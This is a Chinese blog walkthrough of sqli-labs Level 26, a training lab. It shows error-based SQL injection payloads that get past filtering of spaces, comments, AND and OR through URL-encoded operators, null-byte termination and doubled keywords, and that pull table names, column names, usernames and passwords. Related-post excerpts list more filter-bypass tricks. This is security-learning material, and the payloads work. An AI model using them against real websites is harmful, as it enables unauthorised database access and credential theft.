SQL-labs的第26关——空格和注释被过滤报错注入（Get）

Hacker-小胖锅

已于 2023-08-04 16:11:12 修改

阅读量887

点赞数 1

文章标签： sql 数据库

于 2023-08-04 15:55:17 首次发布

本文链接：https://blog.youkuaiyun.com/qq_73393033/article/details/132106416

版权

本文揭秘了SQL注入的实战技巧，包括检测闭合字符、获取数据库信息和数据泄露防范，提醒开发者注意网站安全性。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1、判断闭合方式

输入语句

?id=1\;%00

，返回页面如下：

'号可能是闭合方式。

我们输入

?id=1';%00

，返回页面如下

我们可以确定'号就是该网站的闭合符号。

2、确定数据库名的长度

输入语句

?id=1'%26%26length(database())=8;%00

，返回页面如下：

3、爆破数据表名

输入语句

?id=1'||updatexml(1,concat('~',(select+(group_concat(table_name))from+(infoorrmation_schema.tables)+where+(table_schema=database())),'~'),1);%00

，返回页面如下：

4、爆破列名

输入语句

?id=1'%26%26extractvalue(1,concat('~',(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users')aandnd(table_schema=database())),'~'));%00

，返回页面如下：

5、爆破字段内容

输入语句

?id=1'%26%26updatexml(1,concat('~',(select (group_concat(concat(id,'~',username,'~',password))) from (users)),'~'),1);%00

，返回页面如下：

我们发现返回的内容不完全，我们将语句改为：?

id=1'%26%26updatexml(1,concat('~',mid((select (group_concat(concat(id,'~',username,'~',passwoorrd))) from (users)),10,22),'~'),1);%00

，返回页面如下：

到此打靶结束

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Hacker-小胖锅

关注关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

ctf.show web6 sql注入过滤了空格

m0_46412682的博客

07-13

831

ctf.show web6 sql注入过滤了空格开始的页面。是一个登录的页面随便输入用户名和密码，没有报错之类的，就把账户名和密码都清空了那就来burpsuit抓包先用个万能密码 ’ or 1=1 # 这里提示sql注入错误，一般是有过滤，这里过滤了空格，绕过空格被过滤的可以用 /**/ ,(),`,tab,两个空格这利我们用/**/代替空格先判断有多少字段，先用4个测试一下，没有出现欢迎你的字样那就用三个，测试成功爆库 username=admin'/**/or/**/1=1/**/u

Sql-labs 靶场搭建及通关

ming20211016的博客

11-07

3374

该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内。mysql_real_escape_string函数，宽字节注⼊，符号绕过，联合注⼊。没⽤禁⽤or，and，但过滤了select和union，可以⽤⼤⼩写和重写进⾏绕过。

1 条评论您还未登录，请先登录后发表或查看评论

SQL注入中空格与逗号过滤的绕过技巧总结

热门推荐

wangyuxiang946的博客

06-28

1万+

SQLi 第二十五关，SQLi-LABS Less-25，SQLi-LABS Less 25，SQLiLABS Less25，SQLi Less 25

sqli-labs注入——sqli-labs的1-65关闯关指南

qq_51366383的博客

01-27

1956

sqli-labs图片上一共有75关，但是下载的资料都只有65关，所以只写了65关，本文仅是个人想法，如有不对请多谅解。前面三部分的数据为：security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password：Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,

SQL注入——sqli-labs（Less-1）

E-Malon的博客

05-29

433

一边查看源码，一边多方学习别人的 WriteUp，在此过程中补充基础知识，最终落到实验操作。慢慢来，比较快。欢迎大咖指导，欢迎各位网友交流经验。

sql注入空格被过滤_SQL注入：各种绕过检测的姿势

weixin_39874589的博客

11-16

4394

这一篇主要总结一下sqlilabs中advanced injection中的用到的各种绕过，也就是less21-less38。目录1）数据编码2）特殊字符、语法关键字过滤3）存储型注入4）特殊字符转义与宽字节注入5）防火墙保护与http参数污染数据编码http://111.231.88.117/sqli_lab/sqli-labs-php7/Less-21/ http://111.231.88.1...

sqli-labs第26~28关

yuqnqi的博客

05-13

506

查看源码黑名单，过滤了 or，and ， /* , – , # , 空格 , /\s 代表中的一个空白字符（可能是空格、、其他空白）即 \s 用于匹配空白字符。我们常见的绕过空格的就是多行注释，/**/但这里过滤了，不太行啊将空格，or，and,/*,#,--,/等各种符号过滤，此处对于and，or的处理方法不再赘述，参考25.此处我们需要说明两方面：对于注释和结尾字符的我们此处只能利用构造一个 ' 来闭合后面到 '；对于空格，有较多的方法：%09 TAB键（水平）%0a 新建一行。

sql注入空格被过滤_SQL注入基础整理 - 11阳光

weixin_39867125的博客

10-21

1500

题记本文转自前言：对已知的SQL注入手段作了较为全面和详尽的整理，大概是我几年的全部积累了，虽然可能有许多遗漏的地方，但我相信还是很有参考价值的。本文的注入场景为：一、基础注入 1.联合查询即最常见的union注入：若前面的查询结果不为空，则返回两次查询的值：若前面的查询结果为空，则只返回union查询的值：查完数据库接下来就要查表名：' union selectgroup_c...

sqli-labs26

qq_53030229的博客

06-01

1142

文章目录一、审查源码1、判断注入点和闭合方式2、过滤方式二、SQL注入1、获取数据库 双写绕过：anandd 大小写绕过And ASCII编码绕过 %20、%0a绕过内联注释：/!**/ 替换：如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过：%a0 || %0b 等等，过滤字符我们可以用 and || or 替代一、审查源码 1、判断注入点和闭合方式由于这个是与数据库交互的语句，通过这个判断

一个空格引起的sql报错问题

wangwenzhe的博客

08-19

588

同事一个简单的查询sql,写完一直报错,怎么看sql都是正常的,但是一直提示sql语法错误。ps:有问题的空格虽然长度是0但是明显粘的位置较宽。最后,终于同事查出来是因为粘贴的空格问题。记录下来,为以后排查sql错误做个引导。有问题的空格是望上粘贴的。

sqli-labs靶场第26-30关

yjh20041010的博客

12-16

933

这关将逻辑运算符，注释符以及空格给过滤了我们先使用单引号进行闭合这时我们查看源代码可以看到这一关过滤了很多字符可以看到这里将or and / -- # 空格等字符都被注释了空格被过滤了我们可以使用()来代替，and和or可以使用双写来绕过因为报错注入空格少，所以这里我们使用报错注入查询数据库名查询表名字段名以及字段下的数据我们获取到了数据库的数据自此通关。

sqli-labs(26)

weixin_30552635的博客

05-28

569

0X01 测试闭合单引号报错双引号不报错 ’闭合构造语句过滤了空格和and ?id=1' anandd 1=1%23 ?id=1'+anandd+1=1%23 百度一下一去看源码真的顶不住那我们就别光想着正确的地方输入了我们用报错注入 ?id=1'||updatexml(1,concat(':',(select database...

Sqlilabs-26

KAKA的博客

07-14

2387

来到了 Sqlilabs 大魔王的第 26 关关卡… 来到页面就看到大大的，“你的所有空格和过滤符都属于我们“，这难得到机智的你吗？在此说下常见的绕过方法有：（本来这应该在 25 关卡就说的，忘了…）双写绕过大小写绕过编码绕过，如：hex || URL 注释符绕过，如：/!select/ 替换：如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过：%a0 || %0b 等等，过滤字符我们可以用 and || or 替代有了上述的神兵利器，那就很

sql注入绕过空格过滤

一只菜鸟的博客

10-31

6712

SQL注入时，空格的使用是非常普遍的。比如，我们使用union来取得目标数据： http://www.xxx.com/index.php?id=1 and 0 union select null,null,null 上面的语句，在and两侧、union两侧、select的两侧，都需要空格。 1. 注释绕过空格这是最基本的方法，在一些自动化SQL注射工具中，使用也十分普遍。在MySQL中，用 /*注释*/ 来标记注释的内容。比如SQL查询： select user() from dual 我们用注释替换空格

sqli-labs第六关报错注入

12-27

### SQLi-Labs 第六关报错注入解决方案在SQLi-Labs第六关中，目标是在存在漏洞的应用程序中利用报错注入来获取敏感信息。通过分析输入参数`id`并尝试不同的SQL语法结构可以实现这一点。当应用程序未正确过滤用户输入时，攻击者可以通过构造特定的SQL查询字符串使服务器返回错误消息，进而泄露数据库内部的信息。对于本案例而言： - 需要构建一个能够触发MySQL错误响应的payload。 - 利用`UNION SELECT`语句结合已知列数（基于前面提到的测试得知有三列），并通过附加特殊字符让查询失败从而暴露更多细节[^2]。具体操作方法如下所示： ```sql http://localhost/sqli-labs/Less-6/?id=-1' UNION SELECT 1,2,CONCAT(table_name),4 FROM information_schema.tables WHERE table_schema=database() -- ``` 上述URL中的请求部分包含了精心设计过的SQL片段，其目的是为了让原本正常的SELECT查询与额外定义的选择项组合起来执行；这里选择了information_schema下的tables表作为数据源，并试图提取其中的table_name字段值。由于最后一行使用了注释符(`--`)使得后续可能出现的有效SQL代码被忽略不计，这样就形成了一个完整的恶意指令链路。需要注意的是，在实际环境中实施此类技术属于非法行为，仅限于授权范围内的安全测试活动内开展研究工作。 #### PHP代码示例展示如何连接到MySQL以及发送查询命令下面给出一段简单的PHP脚本来说明怎样建立同MySQL之间的链接关系，并向它传递一条查询语句： ```php <?php $con = mysql_connect("localhost", "mysql_user", "mysql_pwd"); if (!$con) { die('Could not connect: ' . mysql_error()); } $sql = "SELECT * FROM Person"; mysql_query($sql, $con); // 进行业务逻辑处理... mysql_close($con); ?> ``` 这段代码展示了基本的数据库交互流程，但在现代Web应用开发实践中建议采用更先进的API接口如PDO或mysqli扩展替代过时的mysql_*系列函数[^3]。

SQL-labs的第26关——空格和注释被过滤 报错注入（Get）

1、判断闭合方式

2、确定数据库名的长度

3、爆破数据表名

4、爆破列名

5、爆破字段内容

到此打靶结束

SQL-labs的第26关——空格和注释被过滤报错注入（Get）